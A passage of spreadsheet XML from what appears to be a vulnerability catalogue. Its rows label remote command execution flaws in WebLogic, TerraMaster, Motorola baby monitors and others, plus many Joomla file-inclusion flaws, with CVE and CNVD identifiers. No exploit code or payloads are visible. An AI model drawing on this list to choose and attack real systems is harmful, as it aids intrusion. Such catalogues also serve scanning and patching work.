      <c r="C190" s="2" t="s">
        <v>658</v>
      </c>
      <c r="D190" s="2" t="str">
        <f t="shared" si="2"/>
        <v>WebLogic_远程命令执行_CVE-2020-14882</v>
      </c>
      <c r="E190" s="6" t="s">
        <v>659</v>
      </c>
      <c r="F190" s="4" t="s">
        <v>660</v>
      </c>
    </row>
    <row r="191" s="4" customFormat="1" spans="1:6">
      <c r="A191" s="2" t="s">
        <v>661</v>
      </c>
      <c r="B191" s="2" t="s">
        <v>635</v>
      </c>
      <c r="C191" s="2" t="s">
        <v>662</v>
      </c>
      <c r="D191" s="2" t="str">
        <f t="shared" si="2"/>
        <v>TerraMaster TOS_远程命令执行_CVE-2020-28188</v>
      </c>
      <c r="E191" s="6" t="s">
        <v>663</v>
      </c>
      <c r="F191" s="4" t="s">
        <v>664</v>
      </c>
    </row>
    <row r="192" s="4" customFormat="1" spans="1:6">
      <c r="A192" s="2" t="s">
        <v>665</v>
      </c>
      <c r="B192" s="2" t="s">
        <v>635</v>
      </c>
      <c r="C192" s="2" t="s">
        <v>666</v>
      </c>
      <c r="D192" s="2" t="str">
        <f t="shared" si="2"/>
        <v>Motorola Baby Monitors_远程命令执行_CVE-2021-3577</v>
      </c>
      <c r="E192" s="6" t="s">
        <v>667</v>
      </c>
      <c r="F192" s="4" t="s">
        <v>668</v>
      </c>
    </row>
    <row r="193" s="4" customFormat="1" spans="1:6">
      <c r="A193" s="2" t="s">
        <v>669</v>
      </c>
      <c r="B193" s="2" t="s">
        <v>635</v>
      </c>
      <c r="C193" s="2" t="s">
        <v>670</v>
      </c>
      <c r="D193" s="2" t="str">
        <f t="shared" si="2"/>
        <v>Telesquare TLR_远程命令执行_CVE-2024-29269</v>
      </c>
      <c r="E193" s="6" t="s">
        <v>671</v>
      </c>
      <c r="F193" s="4" t="s">
        <v>672</v>
      </c>
    </row>
    <row r="194" s="4" customFormat="1" spans="1:6">
      <c r="A194" s="2" t="s">
        <v>6</v>
      </c>
      <c r="B194" s="2" t="s">
        <v>635</v>
      </c>
      <c r="C194" s="2"/>
      <c r="D194" s="2" t="str">
        <f t="shared" ref="D194:D257" si="3">_xlfn.TEXTJOIN("_",TRUE,A194:C194)</f>
        <v>大华_远程命令执行</v>
      </c>
      <c r="E194" s="6" t="s">
        <v>673</v>
      </c>
      <c r="F194" s="4" t="s">
        <v>674</v>
      </c>
    </row>
    <row r="195" s="4" customFormat="1" spans="1:6">
      <c r="A195" s="2" t="s">
        <v>675</v>
      </c>
      <c r="B195" s="2" t="s">
        <v>635</v>
      </c>
      <c r="C195" s="2"/>
      <c r="D195" s="2" t="str">
        <f t="shared" si="3"/>
        <v>深信服日志中心_远程命令执行</v>
      </c>
      <c r="E195" s="6" t="s">
        <v>676</v>
      </c>
      <c r="F195" s="4" t="s">
        <v>677</v>
      </c>
    </row>
    <row r="196" s="4" customFormat="1" spans="1:6">
      <c r="A196" s="2" t="s">
        <v>678</v>
      </c>
      <c r="B196" s="2" t="s">
        <v>635</v>
      </c>
      <c r="C196" s="2"/>
      <c r="D196" s="2" t="str">
        <f t="shared" si="3"/>
        <v>TamronOS IPTV/VOD_远程命令执行</v>
      </c>
      <c r="E196" s="6" t="s">
        <v>679</v>
      </c>
      <c r="F196" s="4" t="s">
        <v>680</v>
      </c>
    </row>
    <row r="197" s="4" customFormat="1" spans="1:6">
      <c r="A197" s="2" t="s">
        <v>428</v>
      </c>
      <c r="B197" s="2" t="s">
        <v>635</v>
      </c>
      <c r="C197" s="2"/>
      <c r="D197" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Nginx_远程命令执行</v>
      </c>
      <c r="E197" s="6" t="s">
        <v>681</v>
      </c>
      <c r="F197" s="4" t="s">
        <v>682</v>
      </c>
    </row>
    <row r="198" s="4" customFormat="1" spans="1:6">
      <c r="A198" s="2" t="s">
        <v>232</v>
      </c>
      <c r="B198" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C198" s="2" t="s">
        <v>684</v>
      </c>
      <c r="D198" s="2" t="str">
        <f t="shared" si="3"/>
        <v>致远OA_任意文件包含_CNVD-2020-62422</v>
      </c>
      <c r="E198" s="6" t="s">
        <v>685</v>
      </c>
      <c r="F198" s="4" t="s">
        <v>686</v>
      </c>
    </row>
    <row r="199" s="4" customFormat="1" spans="1:6">
      <c r="A199" s="2" t="s">
        <v>687</v>
      </c>
      <c r="B199" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C199" s="2" t="s">
        <v>688</v>
      </c>
      <c r="D199" s="2" t="str">
        <f t="shared" si="3"/>
        <v>XxunchiCMS_任意文件包含_CNVD-2020-23735</v>
      </c>
      <c r="E199" s="6" t="s">
        <v>689</v>
      </c>
      <c r="F199" s="4" t="s">
        <v>690</v>
      </c>
    </row>
    <row r="200" s="4" customFormat="1" spans="1:6">
      <c r="A200" s="2" t="s">
        <v>691</v>
      </c>
      <c r="B200" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C200" s="2" t="s">
        <v>692</v>
      </c>
      <c r="D200" s="2" t="str">
        <f t="shared" si="3"/>
        <v>若依_任意文件包含_CNVD-2021-01931</v>
      </c>
      <c r="E200" s="6" t="s">
        <v>693</v>
      </c>
      <c r="F200" s="4" t="s">
        <v>694</v>
      </c>
    </row>
    <row r="201" s="4" customFormat="1" spans="1:6">
      <c r="A201" s="2" t="s">
        <v>695</v>
      </c>
      <c r="B201" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C201" s="2" t="s">
        <v>696</v>
      </c>
      <c r="D201" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Squirrelmail_任意文件包含_CVE-2006-2842</v>
      </c>
      <c r="E201" s="6" t="s">
        <v>697</v>
      </c>
      <c r="F201" s="4" t="s">
        <v>698</v>
      </c>
    </row>
    <row r="202" s="4" customFormat="1" spans="1:6">
      <c r="A202" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B202" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C202" s="2" t="s">
        <v>699</v>
      </c>
      <c r="D202" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2007-4504</v>
      </c>
      <c r="E202" s="6" t="s">
        <v>700</v>
      </c>
      <c r="F202" s="4" t="s">
        <v>701</v>
      </c>
    </row>
    <row r="203" s="4" customFormat="1" spans="1:6">
      <c r="A203" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B203" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C203" s="2" t="s">
        <v>702</v>
      </c>
      <c r="D203" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2008-6172</v>
      </c>
      <c r="E203" s="6" t="s">
        <v>703</v>
      </c>
      <c r="F203" s="4" t="s">
        <v>704</v>
      </c>
    </row>
    <row r="204" s="4" customFormat="1" spans="1:6">
      <c r="A204" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B204" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C204" s="2" t="s">
        <v>705</v>
      </c>
      <c r="D204" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2008-4668</v>
      </c>
      <c r="E204" s="6" t="s">
        <v>706</v>
      </c>
      <c r="F204" s="4" t="s">
        <v>707</v>
      </c>
    </row>
    <row r="205" s="4" customFormat="1" spans="1:6">
      <c r="A205" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B205" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C205" s="2" t="s">
        <v>708</v>
      </c>
      <c r="D205" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2008-6222</v>
      </c>
      <c r="E205" s="6" t="s">
        <v>709</v>
      </c>
      <c r="F205" s="4" t="s">
        <v>710</v>
      </c>
    </row>
    <row r="206" s="4" customFormat="1" spans="1:6">
      <c r="A206" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B206" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C206" s="2" t="s">
        <v>711</v>
      </c>
      <c r="D206" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2008-4764</v>
      </c>
      <c r="E206" s="6" t="s">
        <v>712</v>
      </c>
      <c r="F206" s="4" t="s">
        <v>713</v>
      </c>
    </row>
    <row r="207" s="4" customFormat="1" spans="1:6">
      <c r="A207" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B207" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C207" s="2" t="s">
        <v>714</v>
      </c>
      <c r="D207" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2008-6080</v>
      </c>
      <c r="E207" s="6" t="s">
        <v>715</v>
      </c>
      <c r="F207" s="4" t="s">
        <v>716</v>
      </c>
    </row>
    <row r="208" s="4" customFormat="1" spans="1:6">
      <c r="A208" s="2" t="s">
        <v>717</v>
      </c>
      <c r="B208" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C208" s="2" t="s">
        <v>718</v>
      </c>
      <c r="D208" s="2" t="str">
        <f t="shared" si="3"/>
        <v>phpPgAdmin_任意文件包含_CVE-2008-5587</v>
      </c>
      <c r="E208" s="6" t="s">
        <v>719</v>
      </c>
      <c r="F208" s="4" t="s">
        <v>720</v>
      </c>
    </row>
    <row r="209" s="4" customFormat="1" spans="1:6">
      <c r="A209" s="2" t="s">
        <v>721</v>
      </c>
      <c r="B209" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C209" s="2" t="s">
        <v>722</v>
      </c>
      <c r="D209" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Cisco_任意文件包含_CVE-2009-1558</v>
      </c>
      <c r="E209" s="6" t="s">
        <v>723</v>
      </c>
      <c r="F209" s="4" t="s">
        <v>724</v>
      </c>
    </row>
    <row r="210" s="4" customFormat="1" spans="1:6">
      <c r="A210" s="2" t="s">
        <v>725</v>
      </c>
      <c r="B210" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C210" s="2" t="s">
        <v>726</v>
      </c>
      <c r="D210" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Horde/Horde Groupware_任意文件包含_CVE-2009-0932</v>
      </c>
      <c r="E210" s="6" t="s">
        <v>727</v>
      </c>
      <c r="F210" s="4" t="s">
        <v>728</v>
      </c>
    </row>
    <row r="211" s="4" customFormat="1" spans="1:6">
      <c r="A211" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B211" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C211" s="2" t="s">
        <v>729</v>
      </c>
      <c r="D211" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2009-3053</v>
      </c>
      <c r="E211" s="6" t="s">
        <v>730</v>
      </c>
      <c r="F211" s="4" t="s">
        <v>731</v>
      </c>
    </row>
    <row r="212" s="4" customFormat="1" spans="1:6">
      <c r="A212" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B212" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C212" s="2" t="s">
        <v>732</v>
      </c>
      <c r="D212" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2009-1496</v>
      </c>
      <c r="E212" s="6" t="s">
        <v>733</v>
      </c>
      <c r="F212" s="4" t="s">
        <v>734</v>
      </c>
    </row>
    <row r="213" s="4" customFormat="1" spans="1:6">
      <c r="A213" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B213" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C213" s="2" t="s">
        <v>735</v>
      </c>
      <c r="D213" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2009-2100</v>
      </c>
      <c r="E213" s="6" t="s">
        <v>736</v>
      </c>
      <c r="F213" s="4" t="s">
        <v>737</v>
      </c>
    </row>
    <row r="214" s="4" customFormat="1" spans="1:6">
      <c r="A214" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B214" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C214" s="2" t="s">
        <v>738</v>
      </c>
      <c r="D214" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2009-2015</v>
      </c>
      <c r="E214" s="6" t="s">
        <v>739</v>
      </c>
      <c r="F214" s="4" t="s">
        <v>740</v>
      </c>
    </row>
    <row r="215" s="4" customFormat="1" spans="1:6">
      <c r="A215" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B215" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C215" s="2" t="s">
        <v>741</v>
      </c>
      <c r="D215" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2009-4202</v>
      </c>
      <c r="E215" s="6" t="s">
        <v>742</v>
      </c>
      <c r="F215" s="4" t="s">
        <v>743</v>
      </c>
    </row>
    <row r="216" s="4" customFormat="1" spans="1:6">
      <c r="A216" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B216" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C216" s="2" t="s">
        <v>744</v>
      </c>
      <c r="D216" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2009-4679</v>
      </c>
      <c r="E216" s="6" t="s">
        <v>745</v>
      </c>
      <c r="F216" s="4" t="s">
        <v>746</v>
      </c>
    </row>
    <row r="217" s="4" customFormat="1" spans="1:6">
      <c r="A217" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B217" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C217" s="2" t="s">
        <v>747</v>
      </c>
      <c r="D217" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2009-3318</v>
      </c>
      <c r="E217" s="6" t="s">
        <v>748</v>
      </c>
      <c r="F217" s="4" t="s">
        <v>749</v>
      </c>
    </row>
    <row r="218" s="4" customFormat="1" spans="1:6">
      <c r="A218" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B218" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C218" s="2" t="s">
        <v>750</v>
      </c>
      <c r="D218" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2010-1217</v>
      </c>
      <c r="E218" s="6" t="s">
        <v>751</v>
      </c>
      <c r="F218" s="4" t="s">
        <v>752</v>
      </c>
    </row>
    <row r="219" s="4" customFormat="1" spans="1:6">
      <c r="A219" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B219" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C219" s="2" t="s">
        <v>753</v>
      </c>
      <c r="D219" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2010-1494</v>
      </c>
      <c r="E219" s="6" t="s">
        <v>754</v>
      </c>
      <c r="F219" s="4" t="s">
        <v>755</v>
      </c>
    </row>
    <row r="220" s="4" customFormat="1" spans="1:6">
      <c r="A220" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B220" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C220" s="2" t="s">
        <v>756</v>
      </c>
      <c r="D220" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2010-1471</v>
      </c>
      <c r="E220" s="6" t="s">
        <v>757</v>
      </c>
      <c r="F220" s="4" t="s">
        <v>758</v>
      </c>
    </row>
    <row r="221" s="4" customFormat="1" spans="1:6">
      <c r="A221" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B221" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C221" s="2" t="s">
        <v>759</v>
      </c>
      <c r="D221" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2010-1473</v>
      </c>
      <c r="E221" s="6" t="s">
        <v>760</v>
      </c>
      <c r="F221" s="4" t="s">
        <v>761</v>
      </c>
    </row>
    <row r="222" s="4" customFormat="1" spans="1:6">
      <c r="A222" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B222" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C222" s="2" t="s">
        <v>762</v>
      </c>
      <c r="D222" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2010-1979</v>
      </c>
      <c r="E222" s="6" t="s">
        <v>763</v>
      </c>
      <c r="F222" s="4" t="s">
        <v>764</v>
      </c>
    </row>
    <row r="223" s="4" customFormat="1" spans="1:6">
      <c r="A223" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B223" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C223" s="2" t="s">
        <v>765</v>
      </c>
      <c r="D223" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2010-1476</v>
      </c>
      <c r="E223" s="6" t="s">
        <v>766</v>
      </c>
      <c r="F223" s="4" t="s">
        <v>767</v>
      </c>
    </row>
    <row r="224" s="4" customFormat="1" spans="1:6">
      <c r="A224" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B224" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C224" s="2" t="s">
        <v>768</v>
      </c>
      <c r="D224" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2010-1714</v>
      </c>
      <c r="E224" s="6" t="s">
        <v>769</v>
      </c>
      <c r="F224" s="4" t="s">
        <v>770</v>
      </c>
    </row>
    <row r="225" s="4" customFormat="1" spans="1:6">
      <c r="A225" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B225" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C225" s="2" t="s">
        <v>771</v>
      </c>
      <c r="D225" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2010-1718</v>
      </c>
      <c r="E225" s="6" t="s">
        <v>772</v>
      </c>
      <c r="F225" s="4" t="s">
        <v>773</v>
      </c>
    </row>
    <row r="226" s="4" customFormat="1" spans="1:6">
      <c r="A226" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B226" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C226" s="2" t="s">
        <v>774</v>
      </c>
      <c r="D226" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2010-1952</v>
      </c>
      <c r="E226" s="6" t="s">
        <v>775</v>
      </c>
      <c r="F226" s="4" t="s">
        <v>776</v>
      </c>
    </row>
    <row r="227" s="4" customFormat="1" spans="1:6">
      <c r="A227" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B227" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C227" s="2" t="s">
        <v>777</v>
      </c>
      <c r="D227" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2010-0467</v>
      </c>
      <c r="E227" s="6" t="s">
        <v>778</v>
      </c>
      <c r="F227" s="4" t="s">
        <v>779</v>
      </c>
    </row>
    <row r="228" s="4" customFormat="1" spans="1:6">
      <c r="A228" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B228" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C228" s="2" t="s">
        <v>780</v>
      </c>
      <c r="D228" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2010-4977</v>
      </c>
      <c r="E228" s="6" t="s">
        <v>781</v>
      </c>
      <c r="F228" s="4" t="s">
        <v>782</v>
      </c>
    </row>
    <row r="229" s="4" customFormat="1" spans="1:6">
      <c r="A229" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B229" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C229" s="2" t="s">
        <v>783</v>
      </c>
      <c r="D229" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2010-1345</v>
      </c>
      <c r="E229" s="6" t="s">
        <v>784</v>
      </c>
      <c r="F229" s="4" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="230" s="4" customFormat="1" spans="1:6">
      <c r="A230" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B230" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C230" s="2" t="s">
        <v>786</v>
      </c>
      <c r="D230" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2010-1302</v>
      </c>
      <c r="E230" s="6" t="s">
        <v>787</v>
      </c>
      <c r="F230" s="4" t="s">
        <v>788</v>
      </c>
    </row>
    <row r="231" s="4" customFormat="1" spans="1:6">
      <c r="A231" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B231" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C231" s="2" t="s">
        <v>789</v>
      </c>
      <c r="D231" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2010-1955</v>
      </c>
      <c r="E231" s="6" t="s">
        <v>790</v>
      </c>
      <c r="F231" s="4" t="s">
        <v>791</v>
      </c>
    </row>
    <row r="232" s="4" customFormat="1" spans="1:6">
      <c r="A232" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B232" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C232" s="2" t="s">
        <v>792</v>
      </c>
      <c r="D232" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2010-2045</v>
      </c>
      <c r="E232" s="6" t="s">
        <v>793</v>
      </c>
      <c r="F232" s="4" t="s">
        <v>794</v>
      </c>
    </row>
    <row r="233" s="4" customFormat="1" spans="1:6">
      <c r="A233" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B233" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C233" s="2" t="s">
        <v>795</v>
      </c>
      <c r="D233" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2010-1981</v>
      </c>
      <c r="E233" s="6" t="s">
        <v>796</v>
      </c>
      <c r="F233" s="4" t="s">
        <v>797</v>
      </c>
    </row>
    <row r="234" s="4" customFormat="1" spans="1:6">
      <c r="A234" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B234" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C234" s="2" t="s">
        <v>798</v>
      </c>
      <c r="D234" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2010-2920</v>
      </c>
      <c r="E234" s="6" t="s">
        <v>799</v>
      </c>
      <c r="F234" s="4" t="s">
        <v>800</v>
      </c>
    </row>
    <row r="235" s="4" customFormat="1" spans="1:6">
      <c r="A235" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B235" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C235" s="2" t="s">
        <v>801</v>
      </c>
      <c r="D235" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2010-1956</v>
      </c>
      <c r="E235" s="6" t="s">
        <v>802</v>
      </c>
      <c r="F235" s="4" t="s">
        <v>803</v>
      </c>
    </row>
    <row r="236" s="4" customFormat="1" spans="1:6">
      <c r="A236" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B236" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C236" s="2" t="s">
        <v>804</v>
      </c>
      <c r="D236" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2010-1653</v>
      </c>
      <c r="E236" s="6" t="s">
        <v>805</v>
      </c>
      <c r="F236" s="4" t="s">
        <v>806</v>
      </c>
    </row>
    <row r="237" s="4" customFormat="1" spans="1:6">
      <c r="A237" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B237" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C237" s="2" t="s">
        <v>807</v>
      </c>
      <c r="D237" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2010-1314</v>
      </c>
      <c r="E237" s="6" t="s">
        <v>808</v>
      </c>
      <c r="F237" s="4" t="s">
        <v>809</v>
      </c>
    </row>
    <row r="238" s="4" customFormat="1" spans="1:6">
      <c r="A238" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B238" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C238" s="2" t="s">
        <v>810</v>
      </c>
      <c r="D238" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2010-1472</v>
      </c>
      <c r="E238" s="6" t="s">
        <v>811</v>
      </c>
      <c r="F238" s="4" t="s">
        <v>812</v>
      </c>
    </row>
    <row r="239" s="4" customFormat="1" spans="1:6">
      <c r="A239" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B239" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C239" s="2" t="s">
        <v>813</v>
      </c>
      <c r="D239" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2010-1977</v>
      </c>
      <c r="E239" s="6" t="s">
        <v>814</v>
      </c>
      <c r="F239" s="4" t="s">
        <v>815</v>
      </c>
    </row>
    <row r="240" s="4" customFormat="1" spans="1:6">
      <c r="A240" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B240" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C240" s="2" t="s">
        <v>816</v>
      </c>
      <c r="D240" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2010-1601</v>
      </c>
      <c r="E240" s="6" t="s">
        <v>817</v>
      </c>
      <c r="F240" s="4" t="s">
        <v>818</v>
      </c>
    </row>
    <row r="241" s="4" customFormat="1" spans="1:6">
      <c r="A241" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B241" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C241" s="2" t="s">
        <v>819</v>
      </c>
      <c r="D241" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2010-1982</v>
      </c>
      <c r="E241" s="6" t="s">
        <v>820</v>
      </c>
      <c r="F241" s="4" t="s">
        <v>821</v>
      </c>
    </row>
    <row r="242" s="4" customFormat="1" spans="1:6">
      <c r="A242" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B242" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C242" s="2" t="s">
        <v>822</v>
      </c>
      <c r="D242" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2010-5028</v>
      </c>
      <c r="E242" s="6" t="s">
        <v>823</v>
      </c>
      <c r="F242" s="4" t="s">
        <v>824</v>
      </c>
    </row>
    <row r="243" s="4" customFormat="1" spans="1:6">
      <c r="A243" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B243" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C243" s="2" t="s">
        <v>825</v>
      </c>
      <c r="D243" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2010-2128</v>
      </c>
      <c r="E243" s="6" t="s">
        <v>826</v>
      </c>
      <c r="F243" s="4" t="s">
        <v>827</v>
      </c>
    </row>
    <row r="244" s="4" customFormat="1" spans="1:6">
      <c r="A244" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B244" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C244" s="2" t="s">
        <v>828</v>
      </c>
      <c r="D244" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2010-1305</v>
      </c>
      <c r="E244" s="6" t="s">
        <v>829</v>
      </c>
      <c r="F244" s="4" t="s">
        <v>830</v>
      </c>
    </row>
    <row r="245" s="4" customFormat="1" spans="1:6">
      <c r="A245" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B245" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C245" s="2" t="s">
        <v>831</v>
      </c>
      <c r="D245" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2010-1469</v>
      </c>
      <c r="E245" s="6" t="s">
        <v>832</v>
      </c>
      <c r="F245" s="4" t="s">
        <v>833</v>
      </c>
    </row>
    <row r="246" s="4" customFormat="1" spans="1:6">
      <c r="A246" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B246" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C246" s="2" t="s">
        <v>834</v>
      </c>
      <c r="D246" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2010-4719</v>
      </c>
      <c r="E246" s="6" t="s">
        <v>835</v>
      </c>
      <c r="F246" s="4" t="s">
        <v>836</v>
      </c>
    </row>
    <row r="247" s="4" customFormat="1" spans="1:6">
      <c r="A247" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B247" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C247" s="2" t="s">
        <v>837</v>
      </c>
      <c r="D247" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2010-1478</v>
      </c>
      <c r="E247" s="6" t="s">
        <v>838</v>
      </c>
      <c r="F247" s="4" t="s">
        <v>839</v>
      </c>
    </row>
    <row r="248" s="4" customFormat="1" spans="1:6">
      <c r="A248" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B248" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C248" s="2" t="s">
        <v>840</v>
      </c>
      <c r="D248" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2010-4769</v>
      </c>
      <c r="E248" s="6" t="s">
        <v>841</v>
      </c>
      <c r="F248" s="4" t="s">
        <v>842</v>
      </c>
    </row>
    <row r="249" s="4" customFormat="1" spans="1:6">
      <c r="A249" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B249" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C249" s="2" t="s">
        <v>843</v>
      </c>
      <c r="D249" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2010-1980</v>
      </c>
      <c r="E249" s="6" t="s">
        <v>844</v>
      </c>
      <c r="F249" s="4" t="s">
